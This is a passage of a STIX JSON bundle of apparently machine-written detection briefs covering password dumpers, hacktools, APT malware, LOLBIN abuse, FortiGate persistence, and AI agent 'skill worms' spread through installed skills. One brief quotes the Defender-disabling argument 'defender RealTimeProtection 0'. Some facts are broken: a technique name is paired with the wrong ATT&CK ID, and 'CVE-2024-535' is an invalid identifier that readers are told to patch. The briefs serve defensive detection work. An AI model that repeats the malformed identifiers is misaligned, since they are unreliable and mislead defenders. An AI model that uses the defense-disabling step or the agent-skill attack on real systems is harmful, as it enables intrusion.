      "id": "attack-pattern--906f7cd7-b1bb-556c-83aa-30569981cf46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Application Access Token",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1558",
          "url": "https://attack.mitre.org/techniques/T1558"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da22a8ae-91c4-55a8-8e83-1e12fa7f3591",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5dd4226c-fb85-5ea6-9876-56a1cfc60e85",
      "target_ref": "attack-pattern--906f7cd7-b1bb-556c-83aa-30569981cf46"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5dd4226c-fb85-5ea6-9876-56a1cfc60e85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Antivirus Alert for Password Dumper and Stealer Activity",
      "description": "## Overview\n\nThis threat brief focuses on detecting crucial antivirus (AV) alerts related to password dumping and stealing tools on endpoints. While AV solutions often block such malware, the mere presence of these tools warrants immediate and thorough investigation. Their successful execution, even partial, can lead to the compromise of sensitive credentials, enabling attackers to gain persistence, escalate privileges, or move laterally within a network. This detection strategy targets a wide array of known password dumping utilities and techniques, such as Mimikatz, Lazagne, SharpDump, and various PWS (Password Stealer) variants. Early detection of these AV alerts and subsequent remediation is vital for preventing broader network compromise, as credentials are a primary target for almost all advanced persistent threats and opportunistic attackers.\n\n## Attack Chain\n\n[Attack Chain omitted as the source describes a detection signature for a class of tools, not a specific attack campaign or chain.]\n\n## Impact\n\nThe primary impact of password dumpers and stealers is the compromise of user and system credentials. If successful, attackers can use these stolen credentials for lateral movement, privilege escalation, accessing sensitive data, or maintaining persistence within the network. This can lead to significant data breaches, ransomware deployment, financial fraud, or espionage, potentially affecting all sectors. While the AV may block the initial execution, the fact that such a tool reached an endpoint suggests a prior compromise or a failure in preventative controls, necessitating a full investigation to determine if credentials were exfiltrated or other attack stages initiated.\n\n## Recommendation\n\n*   Deploy the `Antivirus - Password Dumper Signature` Sigma rule to your SIEM/EDR platform to ensure critical AV alerts are not overlooked.\n*   Investigate every instance where the `Antivirus - Password Dumper Signature` rule triggers, even if the antivirus reports blocking the threat, to determine the initial access vector and potential credential compromise.\n*   Review the logs associated with the detected password dumper/stealer for any evidence of execution or interaction with processes like `lsass.exe` to gauge the extent of the attempted compromise.\n*   If a password dumper/stealer was detected, assume potential credential compromise and initiate password resets for affected users and service accounts as described in the brief's summary.\n*   Enhance endpoint security configurations to prevent the initial delivery and execution of files identified with signatures such as 'PWS', 'Mimikatz', 'Lazagne', or 'SharpDump'.\n",
      "published": "2026-07-03T14:02:27Z",
      "labels": [
        "credential-access",
        "password-stealer",
        "password-dumper",
        "antivirus",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
        "attack-pattern--906f7cd7-b1bb-556c-83aa-30569981cf46"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.nextron-systems.com/?s=antivirus"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f6d3fc0-9f0f-5b77-a2c8-b750022ac262",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5b5ad375-7756-5841-a0aa-8c3bf8b542c7",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5b5ad375-7756-5841-a0aa-8c3bf8b542c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Antivirus Alert for Hacktools or Attack Tools",
      "description": "## Overview\n\nThis threat brief focuses on detecting antivirus alerts that specifically identify hacktools or other attack-oriented utilities. These detections are characterized by distinct signature patterns, such as those prefixed with 'ATK/', 'Exploit.Script.CVE', 'HKTL', 'HTOOL', 'PWS.', 'PWSX', or containing names of known offensive tools like Mimikatz, Cobalt Strike, Nighthawk, Impacket, or various Sharp-family tools. While antivirus solutions may block these files, the mere presence of such an alert signifies that a malicious or unauthorized actor has successfully delivered or executed components onto a system. This necessitates immediate investigation into the initial access vector and subsequent activity, as ignoring these alerts could lead to overlooked compromises or broader network breaches. The detection rule provides a crucial trigger for security operations teams to initiate incident response protocols.\n\n## Attack Chain\n\nThis brief focuses on the detection of hacktools rather than describing a specific end-to-end attack chain. The presence of these tools often represents a post-exploitation phase, where initial access has already been achieved. While the specific sequence of events leading to the deployment of these tools can vary widely depending on the adversary and their chosen initial access vector (e.g., phishing, vulnerable external service, supply chain compromise), the detection of these tools indicates a critical point in the attack lifecycle where an adversary is attempting to establish persistence, move laterally, or achieve their objectives within the compromised environment.\n\n## Impact\n\nThe successful deployment and potential execution of hacktools by an adversary can lead to severe consequences for an organization. These tools are commonly used for credential theft (e.g., Mimikatz, PWDump), lateral movement (e.g., Impacket, Cobalt Strike), privilege escalation (e.g., various \"Potato\" exploits), and data exfiltration. If left unaddressed, the presence of these tools can result in complete network compromise, data breaches, ransomware deployment, intellectual property theft, and significant financial and reputational damage. The impact of such an event can be widespread, affecting multiple systems and sensitive data across various departments, often resulting in prolonged recovery efforts.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Antivirus - Hacktool Signature\" to your SIEM and configure it to generate high-priority alerts.\n*   Ensure your endpoint security solutions are configured to log all antivirus detections, especially those categorized as \"hacktool\" or \"attack tool\", to the centralized log management system specified in the `logsource: category: antivirus` section of the rule.\n*   Review and investigate every alert triggered by the \"Antivirus - Hacktool Signature\" rule immediately, regardless of whether the antivirus reports blocking the threat. Focus investigations on the delivery mechanism and initial access vector.\n*   Implement proactive threat hunting based on the `Signature` values observed in this brief (e.g., 'Mimikatz', 'Cobalt', 'SharpHound') to identify any undetected instances or historical presence of these tools.\n*   Regularly update antivirus signatures and endpoint detection and response (EDR) solutions to improve detection efficacy against evolving hacktool variants.\n",
      "published": "2026-07-03T14:01:39Z",
      "labels": [
        "antivirus",
        "hacktool",
        "post-exploitation",
        "detection",
        "incident-response",
        "malware"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/category/antivirus/av_hacktool.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/"
        },
        {
          "source_name": "reference",
          "url": "https://www.nextron-systems.com/?s=antivirus"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79701567-4c9c-50ac-ba09-5c2d2d8c31f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--59b39477-1f8f-5089-aa7a-90d000d120d2",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--59b39477-1f8f-5089-aa7a-90d000d120d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Advanced Persistent Threat (APT) Malware Signatures in Antivirus Logs",
      "description": "## Overview\n\nThis brief describes a Sigma rule designed to detect the presence of Advanced Persistent Threat (APT) malware on endpoints by analyzing antivirus (AV) logs. The rule leverages common naming conventions and specific group names used by AV vendors to classify sophisticated threats, such as 'APT', 'UNC', 'UAC', and known actor aliases like 'Lazarus' or 'SandWorm'. Its primary goal is to alert security operations centers (SOCs) to critical AV detections that, despite being blocked by AV, indicate that an APT-related threat has successfully reached an endpoint. This necessitates immediate investigation into the initial access vector and potential persistence to prevent broader compromise.\n\n## Attack Chain\n\nThis brief focuses on the detection of APT malware signatures after initial delivery, rather than describing a specific attack chain. The presence of these signatures in antivirus logs indicates that an attack has progressed beyond initial access to the point where malicious code has landed on an endpoint, prompting the need for further investigation into the precursor activities (e.g., phishing, exploit chains) that led to its presence.\n\n## Impact\n\nThe successful delivery of APT malware, even if initially blocked by antivirus, poses a severe risk. These threats are typically associated with nation-state actors or highly sophisticated criminal organizations aiming for objectives such as long-term espionage, significant data exfiltration, intellectual property theft, or disruptive attacks on critical infrastructure. The mere presence of such malware indicates a potential compromise attempt that could bypass other defenses, leading to profound financial, reputational, and operational damage across various sectors.\n\n## Recommendation\n\n*   Ensure all endpoint security solutions are configured to log antivirus detections and alerts to a centralized SIEM or logging platform, as required by the `antivirus` logsource category.\n*   Deploy the \"Antivirus - APT Malware Signature\" Sigma rule to your SIEM, ensuring it ingests `antivirus` category logs.\n*   Prioritize investigation of alerts generated by the \"Antivirus - APT Malware Signature\" rule, even for \"blocked\" events, to understand the delivery mechanism and assess potential broader compromise.\n*   Review and update antivirus signatures regularly to ensure coverage against emerging APT threats, ensuring the rule remains effective.\n",
      "published": "2026-07-03T14:00:56Z",
      "labels": [
        "detection",
        "antivirus",
        "apt",
        "malware",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/category/antivirus/av_advanced_persistent_threat.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.nextron-systems.com/?s=antivirus"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f17c39f3-b4f7-5ffa-8fac-c73f70ad04ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--23c6237f-0630-5faa-b670-53013b387d3a",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--23c6237f-0630-5faa-b670-53013b387d3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Defender Disabled Via SystemSettingsAdminFlows.EXE",
      "description": "## Overview\n\nThreat actors are observed abusing `SystemSettingsAdminFlows.exe`, a legitimate Windows component, to disable Windows Defender as a crucial step in their attack chains. This technique, identified in ransomware campaigns like LockBit, allows attackers to bypass endpoint detection and response (EDR) mechanisms, facilitating further malicious activities such as payload execution and data exfiltration. The abuse typically occurs post-compromise, leveraging the tool's administrative capabilities to impair security defenses. While `SystemSettingsAdminFlows.exe` is intended for legitimate administrative tasks, its misuse poses a significant threat, enabling attackers to persist and achieve their objectives with reduced interference from host-based security software.\n\n## Attack Chain\n\n1.  **Initial Access:** Threat actors gain initial access to a target system, often through the exploitation of vulnerabilities (e.g., Apache ActiveMQ) or successful phishing campaigns, establishing a foothold.\n2.  **Execution \u0026 Staging:** Following initial access, attackers execute initial payloads, often living-off-the-land binaries or scripts, to establish persistence, perform reconnaissance, and stage further tools.\n3.  **Privilege Escalation:** Adversaries may escalate privileges to administrative levels necessary to modify system settings and security configurations, or compromise an account with sufficient privileges.\n4.  **Defense Impairment:** The attacker leverages the `SystemSettingsAdminFlows.exe` utility with specific command-line arguments (e.g., `defender RealTimeProtection 0`) to disable or modify Windows Defender's real-time protection and other security features.\n5.  **Malware Deployment:** With defenses impaired, actors deploy primary malicious payloads, such as ransomware encryptors (e.g., LockBit) or data exfiltration tools, avoiding immediate detection.\n6.  **Impact \u0026 Objective Achievement:** The deployed malware executes, leading to data encryption, system disruption, data exfiltration, and ultimately achieving the attacker's objectives, typically financial gain through ransom demands.\n\n## Impact\n\nSuccessful exploitation of this technique significantly degrades a system's defensive posture, allowing threat actors to proceed with their attack objectives unhindered. This can lead to the successful deployment and execution of ransomware, resulting in widespread data encryption, system unavailability, and substantial financial losses from recovery efforts and ransom payments. Additionally, data exfiltration becomes more feasible, exposing sensitive information and incurring regulatory fines and reputational damage. The ability to disable core security tools like Windows Defender is a critical enabler for many advanced persistent threats and ransomware groups.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Windows Defender Disabled Via SystemSettingsAdminFlows.EXE\" to your SIEM and tune for your environment to detect suspicious use of the utility.\n*   Enable Sysmon process-creation logging to capture `Image` and `CommandLine` details for `SystemSettingsAdminFlows.exe` executions.\n*   Review and restrict administrative privileges across your environment to limit an attacker's ability to execute defense impairment techniques.\n*   Implement application control solutions to prevent unauthorized execution of `SystemSettingsAdminFlows.exe` or other LOLBINs by non-privileged accounts.\n",
      "published": "2026-07-03T13:59:56Z",
      "labels": [
        "defense-evasion",
        "lolbin",
        "windows",
        "ransomware"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_defender_disable.yml"
        },
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2026/02/23/apache-activemq-exploit-leads-to-lockbit-ransomware/"
        },
        {
          "source_name": "reference",
          "url": "https://www.huntress.com/blog/lolbin-to-inc-ransomware"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8ff4fc9-5181-5be3-ba1c-cd3f8060c1e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65a3bb6a-2ee0-50b1-b5d3-69011c775483",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--49c5fb14-dd5b-5335-8127-f9b7c43e9164",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65a3bb6a-2ee0-50b1-b5d3-69011c775483",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--65a3bb6a-2ee0-50b1-b5d3-69011c775483",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Legitimate Application Dropping Executable",
      "description": "## Overview\n\nThis SigmaHQ rule focuses on detecting the abuse of legitimate Windows applications to drop executable or executable-equivalent files onto disk. This behavior is a common tactic used by threat actors for malware staging, establishing persistence, or facilitating process injection. The rule identifies specific applications, often referred to as Living-Off-The-Land Binaries (LOLBINs) like `certutil.exe` or `mshta.exe`, alongside other trusted software such as Adobe Acrobat Reader (`AcroRd32.exe`) and Microsoft Office components (`eqnedt32.exe`, `wordpad.exe`), when they create files with executable extensions (`.com`, `.dll`, `.exe`, `.jar`, `.ocx`, `.pyc`). This detection is crucial for identifying stealthy post-exploitation activities that bypass traditional signature-based defenses by leveraging trusted system binaries. It helps defenders uncover hidden payloads and unauthorized code execution pathways by monitoring file creation events.\n\n## Impact\n\nIf this activity goes undetected, attackers can establish a strong foothold within a compromised system. The dropped executables can be anything from custom malware, backdoors, or credential stealers to ransomware components. Successful execution of these payloads can lead to full system compromise, data exfiltration, lateral movement within the network, or encryption of critical data, severely disrupting operations and incurring significant financial and reputational damage. The use of legitimate applications makes detection challenging, increasing the likelihood of successful prolonged adversary presence.\n\n## Recommendation\n\n*   Enable Sysmon file event logging (`category: file_event`) on all Windows endpoints to ensure the necessary telemetry for the provided Sigma rule.\n*   Deploy the Sigma rule \"Legitimate Application Dropped Executable\" to your SIEM and tune it for your environment to detect suspicious file drops.\n*   Investigate all high-severity alerts generated by the \"Legitimate Application Dropped Executable\" rule immediately to identify potential malware staging or process injection.\n",
      "published": "2026-07-03T13:58:21Z",
      "labels": [
        "living-off-the-land",
        "LOLBIN",
        "persistence",
        "malware-staging",
        "process-injection",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326"
        },
        {
          "source_name": "reference",
          "url": "https://dmpdump.github.io/posts/TelegramRat/"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/a0d5b30578acd1df9139e7a8a4bfc659dc2cf48f4dc0c5804b70890adeb9fa21/behavior"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad3ecc1f-acc6-5bde-bb1f-5331982b25de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e97ea172-18ef-5a7b-9fcd-faa47633b645",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e97ea172-18ef-5a7b-9fcd-faa47633b645",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Agent Skills Installation Attempt Via Node.EXE",
      "description": "## Overview\n\nThis brief details a detection for the `npx skills add` command executed via `node.exe` on Windows, a vector identified as a potential supply chain risk in the emerging field of AI agents. Threat actors could exploit this legitimate functionality, designed to enhance AI agents like Claude Code or Cursor with new capabilities, by injecting malicious commands into newly installed skills. These \"skill worms\" could then be executed by the AI agent, leading to unauthorized actions, data exfiltration, or infrastructure compromise. The detection, first published on 2026-07-01, highlights the importance for organizations to monitor and regulate the installation of AI agent skills, especially given the rising concerns about the integrity and security of AI tooling. This activity, while sometimes legitimate, warrants careful scrutiny due to its high potential for abuse by malicious actors seeking to leverage AI systems for nefarious purposes.\n\n## Impact\n\nThe successful exploitation of this mechanism could lead to severe consequences for organizations leveraging AI agent tooling. By installing malicious \"skills,\" attackers could gain the ability to execute arbitrary commands within the AI agent's environment, potentially leading to unauthorized data access, intellectual property theft, or further lateral movement within the compromised network. References indicate the risk of \"infecting infrastructures via skill worms\" and instances where \"crypto\" was \"ganked,\" implying financial loss and broader system compromise. The severity of impact depends directly on the privileges and access of the compromised AI agent, which could range from individual user data compromise to widespread network infection if the agent has elevated permissions or broad system access.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM solution and configure it for Windows `process_creation` logs.\n*   Enable comprehensive `process_creation` logging on all Windows endpoints to ensure the Sigma rule can effectively monitor `node.exe` executions.\n*   Implement strict policies regarding the installation and vetting of AI agent skills within your environment, reviewing any \"skills\" installed by the `npx skills add` command.\n*   Tune the provided Sigma rule based on your organization's specific policies regarding the authorized use of AI agent tooling to reduce false positives while maintaining detection efficacy.\n",
      "published": "2026-07-03T13:57:46Z",
      "labels": [
        "ai",
        "node.js",
        "supply-chain",
        "attack.execution",
        "attack.t1059.007"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://blog.lukaszolejnik.com/supply-chain-risk-of-agentic-ai-infecting-infrastructures-via-skill-worms/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/vercel-labs/skills/blob/1f7fbc8d0e49c4e0601d364696bd1bdd15e80967/README.md"
        },
        {
          "source_name": "reference",
          "url": "https://opensourcemalware.com/blog/clawdbot-skills-ganked-your-crypto"
        },
        {
          "source_name": "reference",
          "url": "https://promptintel.novahunting.ai/molt"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c876cb26-809d-555c-abd5-de13366f1960",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2e22a415-6b30-5230-9a08-0c5748c65f78",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2e22a415-6b30-5230-9a08-0c5748c65f78",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FortiGate VPN SSL Settings Modified",
      "description": "## Overview\n\nThis threat brief focuses on the detection of modifications to FortiGate VPN SSL settings, a behavior observed in conjunction with the addition of VPN SSL Web Portals. While such changes can be legitimate for administrative purposes, they are also a common post-exploitation tactic by threat actors seeking to establish persistence and maintain unauthorized access to compromised FortiGate devices and, subsequently, the internal network. The FortiGuard PSIRT advisory FG-IR-24-535, a Remote Code Execution (RCE) vulnerability in FortiGate SSL VPN, confirms active exploitation in the wild, suggesting that these configuration changes are often a follow-up action to successful initial compromise via such vulnerabilities. Defenders should be vigilant for these modifications, as they indicate potential adversarial control over network perimeter devices.\n\n## Attack Chain\n\n1.  **Initial Access**: Threat actors exploit vulnerabilities (e.g., FortiGate SSL VPN RCE like CVE-2024-535) in internet-facing FortiGate appliances.\n2.  **Execution**: Upon successful exploitation, the attacker gains remote code execution capabilities on the FortiGate device.\n3.  **Persistence/Defense Evasion**: The attacker modifies existing VPN SSL settings, potentially altering authentication rules to weaken security controls or bypass multi-factor authentication.\n4.  **Persistence**: The attacker adds a new VPN SSL Web Portal or modifies an existing one to establish a covert or unauthorized access point.\n5.  **Credential Access/Lateral Movement**: New administrative accounts may be created or existing ones compromised to ensure ongoing access through the modified VPN infrastructure.\n6.  **Access/Impact**: The attacker utilizes the altered VPN access to gain unauthorized entry into the internal corporate network, enabling further reconnaissance, data exfiltration, or deployment of additional malicious payloads.\n\n## Impact\n\nSuccessful exploitation leading to VPN SSL setting modifications grants threat actors persistent, unauthorized access to an organization's internal network. This can bypass traditional perimeter defenses and lead to significant data breaches, deployment of ransomware, or other destructive activities. The specific RCE vulnerability (FG-IR-24-535) associated with this activity is actively exploited, increasing the likelihood of real-world impact for unpatched systems. Organizations across all sectors relying on FortiGate SSL VPNs are potential targets.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"FortiGate - VPN SSL Settings Modified\" to your SIEM solution to detect configuration changes.\n*   Ensure FortiGate logging is configured to send `event` service logs, specifically `config` events, to your SIEM for correlation with the provided Sigma rule.\n*   Regularly review FortiGate VPN SSL settings for unauthorized modifications or newly created web portals, comparing current configurations against known baselines.\n*   Patch CVE-2024-535 and any other critical FortiGate SSL VPN vulnerabilities immediately, as exploitation often precedes these configuration changes.\n*   Implement strong authentication, including multi-factor authentication (MFA), for all VPN access, and monitor its enforcement.\n",
      "published": "2026-07-03T13:57:02Z",
      "labels": [
        "persistence",
        "initial-access",
        "network-device",
        "fortigate"
      ],
      "object_refs": [
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-24-535"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44546/44546-logid-event-config-attr"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05ff700f-afd7-5eb8-9f57-76337ccbdf8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5e83c268-766e-55b9-be5d-dfa0f546569f",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5e83c268-766e-55b9-be5d-dfa0f546569f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FortiGate User Group Modification Detected",
      "description": "## Overview\n\nThis brief highlights the detection of suspicious modifications to user groups on Fortinet FortiGate firewall devices. While seemingly benign, unauthorized alteration of user groups is a critical post-compromise activity that threat actors leverage to solidify their foothold within a network. By editing user groups, attackers can grant themselves or other compromised accounts elevated privileges, such as unrestricted VPN access, access to sensitive network segments, or bypass existing security controls. This action serves as a strong indicator of persistence or privilege escalation attempts, enabling adversaries to move laterally or maintain access even if their initial entry point is remediated. Organizations utilizing FortiGate devices should monitor for these configuration changes diligently to identify and respond to potential breaches. This behavior is a generic post-exploitation technique and is not tied to a specific campaign or CVE, but rather a common tactic employed by various threat actors once device access is achieved.\n\n## Impact\n\nSuccessful unauthorized modification of FortiGate user groups can lead to severe consequences, including significant network compromise and data breaches. If an attacker gains unauthorized VPN access, they can bypass network segmentation, access sensitive internal resources, exfiltrate data, or deploy further malicious payloads like ransomware. The impact can extend to complete network control, loss of critical business data, and disruption of operations. The exact number of potential victims or targeted sectors is not specified in the provided intelligence, as this is a detection for a general malicious behavior rather than a specific campaign.\n\n## Recommendation\n\nPrioritized, concrete actions for detection engineering teams.\n- Deploy the Sigma rule \"FortiGate - User Group Modified\" to your SIEM and tune for your environment, paying close attention to administrative accounts performing these changes.\n- Review FortiGate log sources regularly for configuration changes, specifically for the `event` service logs where `cfgpath` is 'user.group' and `action` is 'Edit'.\n- Implement multi-factor authentication (MFA) for all administrative interfaces and VPN access on FortiGate devices to mitigate unauthorized access even if credentials are compromised.\n- Conduct periodic audits of FortiGate user groups and permissions to ensure only authorized changes have been made and to identify any lingering unauthorized configurations.\n",
      "published": "2026-07-03T13:56:14Z",
      "labels": [
        "fortinet",
        "firewall",
        "persistence",
        "privilege-escalation"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-24-535"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event"
        },
        {
          "source_name": "reference",
